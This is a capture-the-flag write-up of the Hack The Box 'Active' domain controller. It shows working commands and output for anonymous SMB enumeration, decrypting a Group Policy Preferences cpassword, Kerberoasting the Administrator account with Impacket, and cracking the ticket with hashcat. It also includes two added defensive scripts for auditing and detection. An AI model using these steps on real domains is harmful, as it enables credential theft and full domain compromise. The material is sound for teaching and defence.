Write-Up: HTB Active

Mertle
12 min read, Oct 26, 2020

For my second blog I tackled the Active box on Hack the Box.

Started off by running the standard nmap scan. Opening the output file, there is a lot available. I haven't stumbled upon too many boxes that aren't web servers, but based on the open ports this one definitely isn't. Instead it looks like we're facing a Windows Server 2008 R2 machine with DNS, SMB, Kerberos, and LDAP all running, which points to a domain controller.

kali@kali:~/htb/active$ nmap -sC -sV 10.10.10.100 -o nmapActive
Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-22 23:54 EDT
Nmap scan report for 10.10.10.100
Host is up (0.025s latency).
Not shown: 983 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-10-23 03:55:37Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 53s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-10-23T03:56:34
|_ start_date: 2020-10-23T03:52:08

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.69 seconds

First thing to attempt is an anonymous smbmap scan. I tend to waffle between using this tool vs. smbclient, but went with smbmap this time. Looking at the results, I have access to the “Replication” share.

kali@kali:~/htb/active$ smbmap -u '' -p '' -H 10.10.10.100
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS

Use -R with smbmap to recursively dump the Replication share. Lots of output, and for some reason it didn't follow all folder paths completely. Strange.

kali@kali:~/htb/active$ smbmap -u '' -p '' -d active.htb -R 'Replication' -H 10.10.10.100
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions Comment
---- ----------- -------
Replication READ ONLY
.\Replication\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 active.htb
.\Replication\active.htb\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 DfsrPrivate
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Policies
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 scripts
.\Replication\active.htb\DfsrPrivate\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ConflictAndDeleted
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Deleted
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Installing
.\Replication\active.htb\Policies\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 {31B2F340-016D-11D2-945F-00C04FB984F9}
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 {6AC1786C-016F-11D2-945F-00C04fB984F9}
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 23 Sat Jul 21 06:38:11 2018 GPT.INI
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Group Policy
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 MACHINE
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 USER
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 119 Sat Jul 21 06:38:11 2018 GPE.INI
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Microsoft
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Preferences
fr--r--r-- 2788 Sat Jul 21 06:38:11 2018 Registry.pol
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Windows NT
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Groups
.\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 22 Sat Jul 21 06:38:11 2018 GPT.INI
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 MACHINE
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 USER
.\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Microsoft
.\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Windows NT

Tried again on the various sub folders (cut out the non-interesting ones to save some space) and found the Groups directory and Groups.xml file under the Policies folder. Based on some previous research (thanks Sean Metcalf for all your AD work), we know that these Group Policy Preferences files can sometimes contain passwords.

kali@kali:~/htb/active$ smbmap -u '' -p '' -d active.htb -R 'Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\' -H 10.10.10.100
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions Comment
---- ----------- -------
Replication READ ONLY
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Groups
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 533 Sat Jul 21 06:38:11 2018 Groups.xml

Download the file… Drum-roll please.

kali@kali:~/htb/active$ smbmap -u '' -p '' -d active.htb --download 'Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml' -H 10.10.10.100
[+] Starting download: Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml (533 bytes)
[+] File output to: /home/kali/htb/active/10.10.10.100-Replication_active.htb_Policies_{31B2F340-016D-11D2-945F-00C04FB984F9}_MACHINE_Preferences_Groups_Groups.xml

And there it is! I've got a username and some form of password hash.

kali@kali:~/htb/active$ cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

Not 100% sure what kind of hash this is, so it's time to google. Searched "Microsoft group policy password hash" and found that it is most likely a GPP hash (thanks Sean, again). Strictly it isn't a hash at all: the cpassword attribute is AES-encrypted with a key Microsoft published in its own documentation, which is why the first tool that comes up, gpp-decrypt, decrypts it outright instead of cracking it. It's already on Kali, so throw the value in and there we go, we have a password! Now time to keep poking.

kali@kali:~/htb/active$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
/usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated
GPPstillStandingStrong2k18
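
The defender's follow-up to this finding is an audit of SYSVOL for any other preference file still carrying a cpassword: the MS14-025 patch stops Windows from writing new ones but leaves existing values in place. The script below is an added example, not code from the write-up; it embeds the Groups.xml recovered above as its sample input plus a constructed empty-cpassword control, reports only the presence of the attribute, and decrypts nothing.

```python
"""Audit Group Policy Preferences (GPP) XML under SYSVOL for leftover cpassword attributes."""
import os
import xml.etree.ElementTree as ET

# Preference files that Microsoft's MS14-025 advisory lists as able to carry a cpassword.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
# Sample input: the Groups.xml from the write-up, embedded so the audit runs offline (raw string keeps the backslashes).
SAMPLE_GROUPS_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2"
      changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
<Properties action="U" newName="" fullName="" description=""
            cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
            changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
</User></Groups>"""

# Constructed control case: the attribute is present but empty, so it must not be reported.
CLEAN_GROUPS_XML = """<Groups><User name="svc_backup" changed="2020-01-01 00:00:00">
<Properties action="U" cpassword="" userName="svc_backup"/></User></Groups>"""

def find_cpasswords(xml_text, path="<inline>"):
    """Return one dict per non-empty cpassword attribute (the account attribute name varies by file type)."""
    root = ET.fromstring(xml_text)
    parent_of = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for elem in root.iter():
        blob = elem.get("cpassword", "")
        if not blob:
            continue
        item = parent_of.get(elem, elem)  # the enclosing preference item carries name/changed
        account = (elem.get("userName") or elem.get("username") or elem.get("accountName")
                   or elem.get("runAs") or item.get("name", ""))
        findings.append({"path": path, "element": elem.tag, "account": account,
                         "changed": item.get("changed", ""), "b64_len": len(blob)})
    return findings

def scan_sysvol(root_dir):
    """Walk a SYSVOL (or Replication) copy and audit every GPP preference file in it."""
    findings = []
    for dirpath, _, filenames in os.walk(root_dir):
        for name in filenames:
            if name in GPP_FILES:
                full = os.path.join(dirpath, name)
                try:
                    with open(full, encoding="utf-8-sig") as fh:  # GPP XML is often BOM-prefixed
                        findings.extend(find_cpasswords(fh.read(), full))
                except (ET.ParseError, OSError) as exc:
                    print(f"[!] skipped {full}: {exc}")
    return findings

if __name__ == "__main__":
    for f in find_cpasswords(SAMPLE_GROUPS_XML) + find_cpasswords(CLEAN_GROUPS_XML):
        print(f"[+] {f['path']}: <{f['element']}> holds a cpassword for {f['account']!r} (changed {f['changed']}, {f['b64_len']} base64 chars)")
```

Point scan_sysvol at a mounted \\dc\SYSVOL (or the Replication share pulled with smbmap -R) and every hit is a preference item whose password should be rotated and removed from the policy.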

Try smbmap with the new user and password combo.

kali@kali:~/htb/active$ smbmap -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -H 10.10.10.100
[+] IP: 10.10.10.100:445 Name: 10.10.10.100 Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY

The Users share immediately sticks out. Dug in, and the recursive smbmap command produced a wall of output, but reading through there's a gem at the bottom.

kali@kali:~/htb/active$ smbmap -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -H 10.10.10.100 -R 'Users'
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions Comment
---- ----------- -------
Users READ ONLY
.\Users\*
dw--w--w-- 0 Sat Jul 21 10:39:20 2018 .
dw--w--w-- 0 Sat Jul 21 10:39:20 2018 ..
dr--r--r-- 0 Mon Jul 16 06:14:21 2018 Administrator
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 All Users
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Default
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Default User
fr--r--r-- 174 Mon Jul 16 17:01:17 2018 desktop.ini
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Public
dr--r--r-- 0 Sat Jul 21 11:16:32 2018 SVC_TGS
.\Users\Default\*
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 .
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 AppData
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Application Data
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Cookies
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Desktop
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Documents
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Downloads
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Favorites
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Links
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Local Settings
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Music
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 My Documents
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 NetHood
fr--r--r-- 262144 Mon Jul 30 09:47:52 2018 NTUSER.DAT
fr--r--r-- 1024 Mon Jul 16 17:01:17 2018 NTUSER.DAT.LOG
fr--r--r-- 95232 Mon Jul 30 09:47:52 2018 NTUSER.DAT.LOG1
fr--r--r-- 0 Mon Jul 16 17:08:47 2018 NTUSER.DAT.LOG2
fr--r--r-- 65536 Mon Jul 16 17:01:17 2018 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
fr--r--r-- 524288 Mon Jul 16 17:01:17 2018 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
fr--r--r-- 524288 Mon Jul 16 17:01:17 2018 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Pictures
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 PrintHood
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Recent
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Saved Games
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 SendTo
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Start Menu
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Templates
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Videos
.\Users\Default\AppData\*
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 .
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Local
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Roaming
.\Users\Default\AppData\Local\*
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 .
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Application Data
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 History
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Microsoft
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Temp
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Temporary Internet Files
.\Users\Default\AppData\Local\Microsoft\*
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 .
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Windows
.\Users\Default\AppData\Local\Microsoft\Windows\*
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 .
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 GameExplorer
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 History
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Temporary Internet Files
.\Users\Default\AppData\Roaming\*
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 .
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Microsoft
.\Users\Default\AppData\Roaming\Microsoft\*
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 .
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Internet Explorer
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Windows
.\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\*
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 .
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 ..
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Quick Launch
.\Users\Default\AppData\Roaming\Microsoft\Windows\*
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 .
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Cookies
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Network Shortcuts
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Printer Shortcuts
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Recent
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 SendTo
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Start Menu
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Templates
.\Users\Default\Documents\*
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 .
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 My Music
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 My Pictures
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 My Videos
.\Users\SVC_TGS\*
dr--r--r-- 0 Sat Jul 21 11:16:32 2018 .
dr--r--r-- 0 Sat Jul 21 11:16:32 2018 ..
dr--r--r-- 0 Sat Jul 21 11:14:20 2018 Contacts
dr--r--r-- 0 Sat Jul 21 11:14:42 2018 Desktop
dr--r--r-- 0 Sat Jul 21 11:14:28 2018 Downloads
dr--r--r-- 0 Sat Jul 21 11:14:50 2018 Favorites
dr--r--r-- 0 Sat Jul 21 11:15:00 2018 Links
dr--r--r-- 0 Sat Jul 21 11:15:23 2018 My Documents
dr--r--r-- 0 Sat Jul 21 11:15:40 2018 My Music
dr--r--r-- 0 Sat Jul 21 11:15:50 2018 My Pictures
dr--r--r-- 0 Sat Jul 21 11:16:05 2018 My Videos
dr--r--r-- 0 Sat Jul 21 11:16:20 2018 Saved Games
dr--r--r-- 0 Sat Jul 21 11:16:32 2018 Searches
.\Users\SVC_TGS\Desktop\*
dr--r--r-- 0 Sat Jul 21 11:14:42 2018 .
dr--r--r-- 0 Sat Jul 21 11:14:42 2018 ..
fr--r--r-- 34 Sat Jul 21 11:14:42 2018 user.txt

Grab that flag and send it in.

kali@kali:~/htb/active$ smbmap -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -d active.htb --download '.\Users\SVC_TGS\Desktop\user.txt' -H 10.10.10.100

Next, I tried crackmapexec to see if I could pop a shell, but nothing. No write permissions, unfortunately.

Looking back at the scan we know the box has LDAP and Kerberos running. Let's enumerate with Impacket modules and see what we can find (another shoutout needed here to Tim Medin for his Kerberoasting webinars).

kali@kali:~/htb/active$ GetADUsers.py -all -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18
Impacket v0.9.22.dev1+20200611.111621.760cb1ea - Copyright 2020 SecureAuth Corporation

[*] Querying 10.10.10.100 for information about domain.
Name Email PasswordLastSet LastLogon
-------------
Administrator 2018-07-18 2018-07-30
Guest <never> <never>
krbtgt 2018-07-18 <never>
SVC_TGS 2018-07-18 2020-10-22

Found some users and tried the password against each of them with crackmapexec, but no dice. Time to try another module to see if we can grab a hash. And there it is! (Note: the command output copied poorly into the code box below, so I did some formatting.)

kali@kali:~/htb/active$ GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18
Impacket v0.9.22.dev1+20200611.111621.760cb1ea - Copyright 2020 SecureAuth Corporation

ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
--------------------------------------------------------------------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2018-07-30 13:17:40.656520

$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$eb5cdb347c259df2a2ae1572f267eadd$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

Identified the hash as Kerberos 5 TGS-REP etype 23 (hashcat mode 13100). Throw the hash into hashcat and…

kali@kali:~/htb/active$ hashcat -a 0 -m 13100 hash.txt ~/rockyou.txt --force

We get a hit!

$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$eb5cdb347c259df2a2ae1572f267eadd$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:Ticketmaster1968
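
Seen from the blue side, the GetUserSPNs.py request above lands on the DC as Security event 4769 with Ticket Encryption Type 0x17 (the etype 23 hashcat just cracked) and a user account, not a computer account, as the Service Name. This added example, not from the post, runs that rule over constructed 4769 records in a key/value export layout; the field names are the real 4769 ones, the client address and the sample values are made up.

```python
"""Flag Kerberoasting-style service ticket requests in Windows Security event 4769 records."""
import re
from collections import defaultdict

RC4_HMAC = 0x17  # etype 23, the ticket type the post cracks with hashcat mode 13100

# Constructed sample: three 4769 events in the key/value layout of an exported event message,
# trimmed to the fields the rule needs and separated by "---". Addresses are made up.
SAMPLE_4769_EVENTS = """
Account Name: SVC_TGS@ACTIVE.HTB
Service Name: Administrator
Client Address: ::ffff:10.10.14.5
Ticket Encryption Type: 0x17
Failure Code: 0x0
---
Account Name: SVC_TGS@ACTIVE.HTB
Service Name: DC$
Client Address: ::ffff:10.10.14.5
Ticket Encryption Type: 0x12
Failure Code: 0x0
---
Account Name: SVC_TGS@ACTIVE.HTB
Service Name: krbtgt
Client Address: ::ffff:10.10.14.5
Ticket Encryption Type: 0x17
Failure Code: 0x0
"""

def parse_4769(text):
    """Split the export into events and each event into a field -> value dict."""
    events = []
    for chunk in text.split("---"):
        fields = dict(re.findall(r"^\s*([A-Za-z ]+?):\s*(.*?)\s*$", chunk, re.M))
        if fields:
            events.append(fields)
    return events

def is_roast_candidate(ev):
    """RC4 service ticket, successfully issued, for a user (not computer) account other than krbtgt."""
    svc = ev.get("Service Name", "")
    etype = int(ev.get("Ticket Encryption Type", "0x0"), 16)
    return (etype == RC4_HMAC and ev.get("Failure Code") == "0x0"
            and not svc.endswith("$") and svc.lower() != "krbtgt")

def kerberoast_alerts(events):
    """Group candidate requests by (requesting account, client address) -> service accounts hit."""
    hits = defaultdict(set)
    for ev in events:
        if is_roast_candidate(ev):
            hits[(ev["Account Name"], ev["Client Address"])].add(ev["Service Name"])
    return {key: sorted(names) for key, names in hits.items()}

if __name__ == "__main__":
    for (who, where), services in kerberoast_alerts(parse_4769(SAMPLE_4769_EVENTS)).items():
        print(f"[!] {who} from {where} requested RC4 service tickets for: {', '.join(services)}")
```

The fix on the account side is the mitigation behind the rule: a long random password (or a gMSA) and AES-only encryption types on any account that carries an SPN make the ticket worthless to crack even when it is requested.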

I checked with smbmap on my first attempt, but I could also have run crackmapexec to confirm the credentials work and then run psexec.py. Ultimately, both paths will get the flag, just one with an actual shell :)

kali@kali:~/htb/active$ smbmap -u 'Administrator' -p 'Ticketmaster1968' -d active.htb -H 10.10.10.100
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
[!] Unable to remove test directory at \\10.10.10.100\SYSVOL\GTHVPIQGDO, please remove manually
Disk Permissions Comment
---- ----------- -------
ADMIN$ READ, WRITE Remote Admin
C$ READ, WRITE Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ, WRITE Logon server share
Replication READ ONLY
SYSVOL READ, WRITE Logon server share
Users READ ONLY

Run another recursive smbmap command on the Users share with admin creds (only the relevant part of the output is shown).

.\Users\Administrator\Desktop\*
dw--w--w-- 0 Mon Jul 30 09:50:10 2018 .
dw--w--w-- 0 Mon Jul 30 09:50:10 2018 ..
fr--r--r-- 282 Mon Jul 30 09:50:10 2018 desktop.ini
fr--r--r-- 34 Sat Jul 21 11:06:06 2018 root.txt

And grab the flag — box owned!

kali@kali:~/htb/active$ smbmap -u 'Administrator' -p 'Ticketmaster1968' -d active.htb --download 'Users\Administrator\Desktop\root.txt' -H 10.10.10.100

If you made it this far, thank you for reading! I am attempting to put out one blog a week as I go through old boxes so check back for more HTB write-ups.
